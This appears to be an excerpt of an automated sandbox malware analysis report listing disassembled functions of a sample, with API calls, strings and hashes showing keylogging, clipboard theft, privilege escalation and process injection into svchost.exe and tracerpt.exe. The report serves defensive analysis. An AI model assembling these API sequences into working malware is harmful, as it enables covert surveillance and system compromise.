                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2882836952-0
                                                                                                  • Opcode ID: 9ee74ed0d87e6276e1aa8bea54370134bcebf134dcb2eb5a3c57addd33e9fce8
                                                                                                  • Instruction ID: 6b0d82995a5df9c66f0251d636cebcf0f4be938373527d9ff371ef732ecc6763
                                                                                                  • Opcode Fuzzy Hash: 9ee74ed0d87e6276e1aa8bea54370134bcebf134dcb2eb5a3c57addd33e9fce8
                                                                                                  • Instruction Fuzzy Hash: 4FD012B4208A00CBD310FB64C494B1AB7E1FF98300F30E926E52EC2B11D638EC819B62
                                                                                                  Function 00974274 Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00006110,00000000), ref: 00990693
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2422867632-0
                                                                                                  • Opcode ID: 3fa89fc6d0b42315ccb965a31c74b2310d50cb1984d25eec03202f9d5cfec02e
                                                                                                  • Instruction ID: b0b01e29636aeb0d6ee29e818148eeea0e03f878375e773198209f0fde546046
                                                                                                  • Opcode Fuzzy Hash: 3fa89fc6d0b42315ccb965a31c74b2310d50cb1984d25eec03202f9d5cfec02e
                                                                                                  • Instruction Fuzzy Hash: E3C04C2529C610EDEA2425442C16F3415003785B25E709F22323B5D5D3459800907653
                                                                                                  Function 0098F63D Relevance: 1.5, APIs: 1, Instructions: 3networkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: send
                                                                                                  • String ID:
                                                                                                  • API String ID: 2809346765-0
                                                                                                  • Opcode ID: 6c06f1915b4af039f1cbf6bcf6cfe0f6da3e4c1d70715700e8d522aedc9a383c
                                                                                                  • Instruction ID: e1804973a2748aa62f9445e48b8a9cbe4fb50affcf08ca5d37c102e9f37d73cd
                                                                                                  • Opcode Fuzzy Hash: 6c06f1915b4af039f1cbf6bcf6cfe0f6da3e4c1d70715700e8d522aedc9a383c
                                                                                                  • Instruction Fuzzy Hash: 3490023829C501AA96001A21685C7552654550474135568245413C0210D614D2847718
                                                                                                  Function 00975EB2 Relevance: 1.3, APIs: 1, Instructions: 15sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32 ref: 00975EB2
                                                                                                    • Part of subcall function 00976F17: _malloc.LIBCMT ref: 00976F31
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Sleep_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 617756273-0
                                                                                                  • Opcode ID: 1e60fa0ead2efce0cce12b9888f1c0e66c31a0e6e3cd007e8dd1195499ed25d5
                                                                                                  • Instruction ID: 52a85034852577dec3b93a35eba0df904de85c32791238f1e83172e2a492aa30
                                                                                                  • Opcode Fuzzy Hash: 1e60fa0ead2efce0cce12b9888f1c0e66c31a0e6e3cd007e8dd1195499ed25d5
                                                                                                  • Instruction Fuzzy Hash: CFD022B3E082028FFBA03EA048E803E60612B80340F758A39D20F92300D66D0D08A3C3

                                                                                                  Non-executed Functions

                                                                                                  Function 02D0E850 Relevance: 72.1, APIs: 36, Strings: 5, Instructions: 311stringfilesynchronizationCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 02D0E8A9
                                                                                                  • Sleep.KERNEL32(00000001,?,?,?,02D0604D), ref: 02D0E8B3
                                                                                                  • GetTickCount.KERNEL32 ref: 02D0E8BF
                                                                                                  • GetTickCount.KERNEL32 ref: 02D0E8D2
                                                                                                  • InterlockedExchange.KERNEL32(02D31F08,00000000), ref: 02D0E8DA
                                                                                                  • OpenClipboard.USER32(00000000), ref: 02D0E8E2
                                                                                                  • GetClipboardData.USER32(0000000D), ref: 02D0E8EA
                                                                                                  • GlobalSize.KERNEL32(00000000), ref: 02D0E8FB
                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 02D0E90C
                                                                                                  • wsprintfW.USER32 ref: 02D0E985
                                                                                                  • _memset.LIBCMT ref: 02D0E9A3
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 02D0E9AC
                                                                                                  • CloseClipboard.USER32 ref: 02D0E9B2
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D0E9CA
                                                                                                  • CreateFileW.KERNEL32(02D30D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 02D0E9E4
                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 02D0EA02
                                                                                                  • lstrlenW.KERNEL32(02D25B48,?,00000000), ref: 02D0EA16
                                                                                                  • WriteFile.KERNEL32(00000000,02D25B48,00000000), ref: 02D0EA25
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D0EA2C
                                                                                                  • ReleaseMutex.KERNEL32(00000000), ref: 02D0EA38
                                                                                                  • GetKeyState.USER32(00000014), ref: 02D0EABC
                                                                                                  • lstrlenW.KERNEL32(02D2B4A8), ref: 02D0EB0B
                                                                                                  • wsprintfW.USER32 ref: 02D0EB1D
                                                                                                  • lstrlenW.KERNEL32(02D2B4D0), ref: 02D0EB3E
                                                                                                  • lstrlenW.KERNEL32(02D2B4D0), ref: 02D0EB61
                                                                                                  • wsprintfW.USER32 ref: 02D0EB7F
                                                                                                  • wsprintfW.USER32 ref: 02D0EB95
                                                                                                  • wsprintfW.USER32 ref: 02D0EBBF
                                                                                                  • lstrlenW.KERNEL32(00000000), ref: 02D0EC0B
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D0EC21
                                                                                                  • CreateFileW.KERNEL32(02D30D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 02D0EC3B
                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 02D0EC59
                                                                                                  • lstrlenW.KERNEL32(00000000,?,00000000), ref: 02D0EC69
                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 02D0EC74
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D0EC7B
                                                                                                  • ReleaseMutex.KERNEL32(00000000), ref: 02D0EC88
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Filelstrlen$wsprintf$ClipboardCloseGlobal$CountCreateHandleMutexObjectPointerReleaseSingleTickWaitWrite_memset$DataExchangeInterlockedLockOpenSizeSleepStateUnlock
                                                                                                  • String ID: [$%s%s$%s%s$%s%s$[esc]
                                                                                                  • API String ID: 1637302245-2373594894
                                                                                                  • Opcode ID: 30f0df2bd2c68bd68afecdc9d9465d4799a7f704d9b627eff69495fb5632e420
                                                                                                  • Instruction ID: f7caa04d9d4bc8211eda1e4568867995c2c248b482b36d751fd76873612b5645
                                                                                                  • Opcode Fuzzy Hash: 30f0df2bd2c68bd68afecdc9d9465d4799a7f704d9b627eff69495fb5632e420
                                                                                                  • Instruction Fuzzy Hash: 5CC1CC70980301ABE3348F64ED89FAA77A4BB28704F444A59F64AD23D0D7B09D99CF60
                                                                                                  Function 02D077E0 Relevance: 68.5, APIs: 30, Strings: 9, Instructions: 240libraryloaderinjectionCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 02D07804
                                                                                                  • _memset.LIBCMT ref: 02D07850
                                                                                                  • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 02D07864
                                                                                                    • Part of subcall function 02D08720: _vswprintf_s.LIBCMT ref: 02D08731
                                                                                                  • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,76F90630,?,76F90F00), ref: 02D07893
                                                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000214,00000000,00000000,00000044,?), ref: 02D078DA
                                                                                                    • Part of subcall function 02D07740: GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,02D078FC), ref: 02D07756
                                                                                                    • Part of subcall function 02D07740: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,02D078FC,?,?,?,?,?,?,76F90630), ref: 02D0775D
                                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?,?,?,76F90630,?,76F90F00), ref: 02D0790A
                                                                                                  • _memset.LIBCMT ref: 02D07923
                                                                                                  • LoadLibraryA.KERNEL32(Kernel32.dll,OpenProcess,?,?,?,?,?,?,?,?,?,76F90630,?,76F90F00), ref: 02D0793B
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D07944
                                                                                                  • LoadLibraryA.KERNEL32(Kernel32.dll,ExitProcess,?,?,?,?,?,?,?,?,?,76F90630,?,76F90F00), ref: 02D07956
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D07959
                                                                                                  • LoadLibraryA.KERNEL32(Kernel32.dll,WinExec,?,?,?,?,?,?,?,?,?,76F90630,?,76F90F00), ref: 02D0796B
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D0796E
                                                                                                  • LoadLibraryA.KERNEL32(Kernel32.dll,WaitForSingleObject,?,?,?,?,?,?,?,?,?,76F90630,?,76F90F00), ref: 02D07980
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D07983
                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,76F90630,?,76F90F00), ref: 02D0798B
                                                                                                  • GetProcessId.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,76F90630,?,76F90F00), ref: 02D07992
                                                                                                  • _memset.LIBCMT ref: 02D079B4
                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,000000FA,?,?,?,?,?,?,?,?,?,?,?,?,76F90630), ref: 02D079CA
                                                                                                  • VirtualAllocEx.KERNEL32(00000000,00000000,00000118,00003000,00000040), ref: 02D079FF
                                                                                                  • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000118,00000000), ref: 02D07A1B
                                                                                                  • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000001,?), ref: 02D07A43
                                                                                                  • VirtualAllocEx.KERNEL32(00000000,00000000,00001000,00003000,00000040), ref: 02D07A58
                                                                                                  • WriteProcessMemory.KERNEL32(00000000,00000000,02D076F0,00001000,00000000), ref: 02D07A72
                                                                                                  • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000001,00000000), ref: 02D07A90
                                                                                                  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000), ref: 02D07AA1
                                                                                                  • Sleep.KERNEL32(0000EA60,?,?,?,?,?,?,?,?,?,?,?,?,?,?,76F90630), ref: 02D07ABA
                                                                                                  • VirtualProtectEx.KERNEL32(00000000,00000000,00000118,00000040,00000000), ref: 02D07AD6
                                                                                                  • VirtualProtectEx.KERNEL32(00000000,00000000,00001000,00000040,00000000), ref: 02D07AE8
                                                                                                  • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,76F90630), ref: 02D07AF1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Process$Virtual$AddressLibraryLoadProcProtect_memset$AllocCreateCurrentFileMemoryOpenThreadWrite$AttributesDirectoryModuleNameRemoteResumeSleepSystemToken_vswprintf_s
                                                                                                  • String ID: %s%s$D$ExitProcess$Kernel32.dll$OpenProcess$WaitForSingleObject$WinExec$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                                  • API String ID: 4176418925-3213446972
                                                                                                  • Opcode ID: 8980f0e15cc21d0bd90809b4a47178393b613d9c9a1bc4906aa5b191d5371b18
                                                                                                  • Instruction ID: 8a71c41fd3618724c2e60b68b12cf358c274cecc2014a546b9d9b69ffda3af00
                                                                                                  • Opcode Fuzzy Hash: 8980f0e15cc21d0bd90809b4a47178393b613d9c9a1bc4906aa5b191d5371b18
                                                                                                  • Instruction Fuzzy Hash: 3C81A671A803587BF7359B619C49FEA777CEFA5B05F400498F609A62C0DBB06E48CE64
                                                                                                  Function 00975820 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 135threadinjectionprocessCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 00975849
                                                                                                  • _memset.LIBCMT ref: 00975868
                                                                                                  • _memset.LIBCMT ref: 0097589D
                                                                                                  • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 009758B1
                                                                                                    • Part of subcall function 009759E0: _vswprintf_s.LIBCMT ref: 009759F1
                                                                                                  • GetFileAttributesA.KERNEL32(?), ref: 009758E0
                                                                                                  • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00975928
                                                                                                  • VirtualAllocEx.KERNEL32(?,00000000,000311BF,00003000,00000040,76F90630), ref: 0097594E
                                                                                                  • WriteProcessMemory.KERNEL32(?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,76F90630), ref: 00975968
                                                                                                  • GetThreadContext.KERNEL32(?,?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,76F90630), ref: 00975987
                                                                                                  • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,76F90630), ref: 009759A2
                                                                                                  • ResumeThread.KERNEL32(?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,76F90630), ref: 009759C1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                  • String ID: %s%s$D$Windows\SysWOW64\tracerpt.exe$Windows\System32\tracerpt.exe
                                                                                                  • API String ID: 2170139861-1986163084
                                                                                                  • Opcode ID: 370edd453b68f6e657681f10ddebb8b4f91e0f0832536053f05e1f304f2efe82
                                                                                                  • Instruction ID: fe907e5959eaf165d8bca0be2fe64e8c2570b6e48db6a5e6e819c235c9b44b46
                                                                                                  • Opcode Fuzzy Hash: 370edd453b68f6e657681f10ddebb8b4f91e0f0832536053f05e1f304f2efe82
                                                                                                  • Instruction Fuzzy Hash: 0A41C7B1A14708AFD720DF70DC85FAA77B8EF44B00F50859CB64DA7280DBB09E848B55
                                                                                                  Function 02D07E50 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 131threadinjectionprocessCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 02D07E73
                                                                                                  • _memset.LIBCMT ref: 02D07E9F
                                                                                                  • _memset.LIBCMT ref: 02D07ED4
                                                                                                  • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 02D07EE8
                                                                                                    • Part of subcall function 02D08720: _vswprintf_s.LIBCMT ref: 02D08731
                                                                                                  • GetFileAttributesA.KERNEL32(?), ref: 02D07F15
                                                                                                  • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02D07F65
                                                                                                  • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 02D07F92
                                                                                                  • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00003000,00000040), ref: 02D07FAA
                                                                                                  • GetThreadContext.KERNEL32(?,?,?,00000000,?,00003000,00000040), ref: 02D07FCC
                                                                                                  • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,00003000,00000040), ref: 02D07FEA
                                                                                                  • ResumeThread.KERNEL32(?,?,00000000,?,00003000,00000040), ref: 02D07FFF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                                                  • String ID: %s%s$D$Windows\SysWOW64\svchost.exe$Windows\System32\svchost.exe
                                                                                                  • API String ID: 2170139861-2473635271
                                                                                                  • Opcode ID: 7dd6ff1adc4ff097031c780e1edfc07c21d5145ea471f64cfa42c1c9fe6eeaa5
                                                                                                  • Instruction ID: 5789274023d1f89807f03c518ddabab89409fc09c940ed19d827a62a0f2d873c
                                                                                                  • Opcode Fuzzy Hash: 7dd6ff1adc4ff097031c780e1edfc07c21d5145ea471f64cfa42c1c9fe6eeaa5
                                                                                                  • Instruction Fuzzy Hash: 804183B1E402586BEB21DB60EC85FDEB7BDEB54700F1041D9B609A62C0DAB06E84CF64
                                                                                                  Function 02D0E4F0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 143synchronizationfilekeyboardCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,02D30D80,76F8E010,76F92FA0,76F90F00,?,02D06028,?,?), ref: 02D0E519
                                                                                                  • lstrcatW.KERNEL32(02D30D80,\DisplaySessionContainers.log,?,02D06028,?,?), ref: 02D0E529
                                                                                                  • CreateMutexW.KERNEL32(00000000,00000000,02D30D80,?,02D06028,?,?), ref: 02D0E538
                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,02D06028,?,?), ref: 02D0E546
                                                                                                  • CreateFileW.KERNEL32(02D30D80,40000000,00000002,00000000,00000004,00000080,00000000,?,02D06028,?,?), ref: 02D0E563
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,02D06028,?,?), ref: 02D0E56E
                                                                                                  • CloseHandle.KERNEL32(00000000,?,02D06028,?,?), ref: 02D0E577
                                                                                                  • DeleteFileW.KERNEL32(02D30D80,?,02D06028,?,?), ref: 02D0E58A
                                                                                                  • ReleaseMutex.KERNEL32(00000000,?,02D06028,?,?), ref: 02D0E597
                                                                                                  • DirectInput8Create.DINPUT8(?,00000800,02D24934,02D31220,00000000,?,02D06028,?,?), ref: 02D0E5B2
                                                                                                  • GetTickCount.KERNEL32 ref: 02D0E665
                                                                                                  • GetKeyState.USER32(00000014), ref: 02D0E672
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile$Mutex$CloseCountDeleteDirectFolderHandleInput8ObjectPathReleaseSingleSizeStateTickWaitlstrcat
                                                                                                  • String ID: <$\DisplaySessionContainers.log
                                                                                                  • API String ID: 1095970075-1170057892
                                                                                                  • Opcode ID: ecbef3adc273da872bc016f90d0a5bc26abbd7a043d597968f74efec1649e236
                                                                                                  • Instruction ID: 8d9f3edfc3438885d88e047762fe6a18eb5cdd1ed33ffdaf27492abb98a48ebd
                                                                                                  • Opcode Fuzzy Hash: ecbef3adc273da872bc016f90d0a5bc26abbd7a043d597968f74efec1649e236
                                                                                                  • Instruction Fuzzy Hash: 5A414174B80215ABE750DFA4EC8AF9A7BA4AB48704F518948F605DB3D0C671EC15CF54
                                                                                                  Function 02D07620 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 69libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00000020,?,?,?,?,?,?,?,?,02D0DFA4), ref: 02D07637
                                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,02D0DFA4), ref: 02D0763E
                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 02D0765A
                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 02D07677
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D07681
                                                                                                  • GetModuleHandleA.KERNEL32(NtDll.dll,NtSetInformationProcess,?,?,?,?,?,?,?,02D0DFA4), ref: 02D07691
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D07698
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 02D076BA
                                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 02D076C7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Process$CurrentHandleOpenToken$AddressAdjustCloseLookupModulePrivilegePrivilegesProcValue
                                                                                                  • String ID: NtDll.dll$NtSetInformationProcess$SeDebugPrivilege
                                                                                                  • API String ID: 1802016953-1577477132
                                                                                                  • Opcode ID: e1bc6aa46d4251b8eab8e90d7fc5e9855512b3b6d49ce1d93d7aeca9549bba59
                                                                                                  • Instruction ID: 3944b9aeeed8618d3ca120a10efe3384cc3c64427425215457b73004215db7d3
                                                                                                  • Opcode Fuzzy Hash: e1bc6aa46d4251b8eab8e90d7fc5e9855512b3b6d49ce1d93d7aeca9549bba59
                                                                                                  • Instruction Fuzzy Hash: C2214F71A80318ABE720DBE4DC4AFBE7778EB58701F514509FA05AA3C0CAB45D58CBA5
                                                                                                  Function 02D1054D Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 92memorylibraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D10576
                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 02D1058E
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 02D1059E
                                                                                                  • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02D105AE
                                                                                                  • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 02D10600
                                                                                                  • VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 02D10615
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$AddressAllocHandleInfoModuleProcProtectQuerySystem
                                                                                                  • String ID: SetThreadStackGuarantee$kernel32.dll
                                                                                                  • API String ID: 3290314748-423161677
                                                                                                  • Opcode ID: a1f8a32df9bc29dc71a2b785a9efc40550744d4c9adeb37bbb4b62df7d3587cf
                                                                                                  • Instruction ID: 5cce00a5a6a39bbd45e6bd56f9aba014813018c66cfba5ddec8c47be892f2807
                                                                                                  • Opcode Fuzzy Hash: a1f8a32df9bc29dc71a2b785a9efc40550744d4c9adeb37bbb4b62df7d3587cf
                                                                                                  • Instruction Fuzzy Hash: 7431A771E40229BBEB20EBA0EC44AEEB7B8EF54749F150515F901E3240DB70AE48CB90
                                                                                                  Function 02D07B70 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 02D07B89
                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 02D07B90
                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02D07BB6
                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 02D07BCC
                                                                                                  • GetLastError.KERNEL32 ref: 02D07BD2
                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D07BE0
